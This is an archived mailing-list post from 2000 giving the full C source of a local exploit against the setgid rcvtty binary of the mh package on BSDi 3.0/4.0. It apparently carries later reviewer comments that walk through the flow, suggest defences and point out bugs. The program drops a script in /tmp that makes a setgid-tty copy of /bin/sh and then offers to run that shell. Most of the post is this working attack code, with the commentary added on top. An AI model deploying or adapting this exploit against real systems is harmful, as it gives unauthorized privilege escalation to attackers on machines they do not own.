Subject: BSDi 3.0/4.0 rcvtty gid=tty exploit... (mh package)
From: Chris Sharp (v9
FAKEHALO.ORG)Date: Sun Nov 26 2000 - 21:04:00 CST
well, i don't know if rcvtty is supposed to be
setgid in general, since i've never seen it setgid
on anything but BSDi 3.0 and 4.0. but
nonetheless, here is an exploit i wrote for it:
(original ver: http://realhalo.org/xrcvtty.c)
xrcvtty.c(modified from original):
----------------------------------
/* (BSDi3.0/4.0)rcvtty[mh] local exploit, by
v9[v9
fakehalo.org]. gives gid=4(tty).
info: found/exploit by: v9[v9
fakehalo.org].
*/
#define PATH "/usr/contrib/mh/lib/rcvtty"
#define MAKESHELL "/tmp/mksh.sh"
#define SGIDSHELL "/tmp/ttysh"
#define GIDTTY 4
#include <stdio.h>
#include <sys/stat.h>
/*
 * main: proof-of-concept against the rcvtty binary at PATH when it is
 * installed setgid to group GIDTTY.
 *
 * Flow, exactly as written below:
 *   1. stat PATH and require st_mode == 34285 (octal 0102755, i.e.
 *      S_IFREG|S_ISGID|0755) and st_gid == GIDTTY; otherwise exit(1).
 *   2. write a small shell script to the fixed path MAKESHELL.
 *   3. run PATH with MAKESHELL as its argument through system().
 *   4. stat SGIDSHELL and report whether it now has the same setgid mode.
 *   5. optionally execl() SGIDSHELL.
 *
 * Defender's view: the only precondition this program tests is the setgid
 * bit on PATH (step 1), so clearing that bit or removing the binary makes
 * the program stop at the "isn't setgid" branch. Both scratch files are
 * fixed, predictable names under /tmp, which makes their creation easy to
 * watch for in file-access auditing.
 *
 * Style notes: implicit-int main() and no <stdlib.h>/<unistd.h> include,
 * so exit/unlink/chmod/system/execl/snprintf rely on implicit declarations
 * (pre-C99). The banner string literal on the next lines is split across a
 * raw line break (the address was mangled by the archive), so this listing
 * does not compile as pasted.
 *
 * Returns: never returns normally; exit(1) on any failed check, exit(0)
 * otherwise (or does not return at all if execl() succeeds).
 */
main(){
/* cmd: buffer for the system() command line.
 * in: declared with ZERO elements -- the scanf("%s",in) below writes at
 *     least a NUL byte past the end of this object (out-of-bounds stack
 *     write in the tool itself). NOTE(review): defect left as-is. */
char cmd[256],in[0];
struct stat mod1,mod2;
FILE *sgidexec;
fprintf(stderr,"[ (BSDi3.0/4.0)rcvtty[mh] local"
" exploit, by v9[v9
fakehalo.org ]. ]\n\n");
/* Step 1: stat() returns non-zero on failure (e.g. PATH absent). */
if(stat(PATH,&mod1)){
fprintf(stderr,"[!] failed, %s doesnt appear to"
" exist.\n",PATH);
exit(1);
}
else
/* 34285 == 0102755 == S_IFREG|S_ISGID|0755; an exact-equality test, so any
 * other permission set (e.g. 2750, or the setgid bit cleared) fails here. */
if(mod1.st_mode==34285&&mod1.st_gid==GIDTTY){
fprintf(stderr,"[*] %s appears to be setgid"
" tty(%d).\n",PATH,GIDTTY);
}
else{
fprintf(stderr,"[!] failed, %s isn't setgid"
" tty(%d).\n",PATH,GIDTTY);
exit(1);
}
fprintf(stderr,"[*] now making shell script to"
" execute.\n");
/* Step 2: recreate MAKESHELL from scratch at a fixed /tmp path. The fopen()
 * result is not checked; a NULL return would be dereferenced by the
 * fprintf() calls below. */
unlink(MAKESHELL);
sgidexec=fopen(MAKESHELL,"w");
fprintf(sgidexec,"#!/bin/sh\n");
fprintf(sgidexec,"cp /bin/sh %s\n",SGIDSHELL);
fprintf(sgidexec,"chgrp %d"
" %s\n",GIDTTY,SGIDSHELL);
fprintf(sgidexec,"chmod 2755 %s\n",SGIDSHELL);
fclose(sgidexec);
/* 33261 == 0100755; only the permission bits (0755) are meaningful to
 * chmod() -- presumably the S_IFREG bit was copied over by mistake. */
chmod(MAKESHELL,33261);
fprintf(stderr,"[*] done, now building and"
" executing the command line.\n");
/* Step 3: bounded snprintf; both operands are compile-time macros, so cmd
 * is not built from any runtime input. */
snprintf(cmd,sizeof(cmd),"echo yes | %s %s"
" 1>/dev/null 2>&1",PATH,MAKESHELL);
system(cmd);
unlink(MAKESHELL);
fprintf(stderr,"[*] done, now checking for"
" success.\n");
/* Step 4: same exact-mode check as step 1, now against SGIDSHELL. */
if(stat(SGIDSHELL,&mod2)){
fprintf(stderr,"[!] failed, %s doesn't"
" exist.\n",SGIDSHELL);
exit(1);
}
else
if(mod2.st_mode==34285&&mod2.st_gid==GIDTTY){
fprintf(stderr,"[*] success, %s is now setgid"
" tty(%d).\n",SGIDSHELL,GIDTTY);
}
else{
fprintf(stderr,"[!] failed, %s isn't setgid"
" tty(%d).\n",SGIDSHELL,GIDTTY);
exit(1);
}
fprintf(stderr,"[*] finished, everything"
" appeared to have gone successful.\n");
fprintf(stderr,"[?] do you wish to enter the"
" sgidshell now(y/n)?: ");
/* Unbounded "%s" read into the zero-length array declared above. */
scanf("%s",in);
/* 0x59 == 'Y', 0x79 == 'y'; anything else aborts. */
if(in[0]!=0x59&&in[0]!=0x79){
printf("[*] ok, aborting execution, the shell"
" is: %s.\n",SGIDSHELL);
}
else{
printf("[*] ok, executing shell(%s) now.\n",
SGIDSHELL);
/* Step 5: the variadic terminator is a bare 0; portable code passes
 * (char *)0 so it has pointer width on every ABI. */
execl(SGIDSHELL,SGIDSHELL,0);
}
exit(0);
}
-- Vade79 -> v9fakehalo.org -> www.fakehalo.org.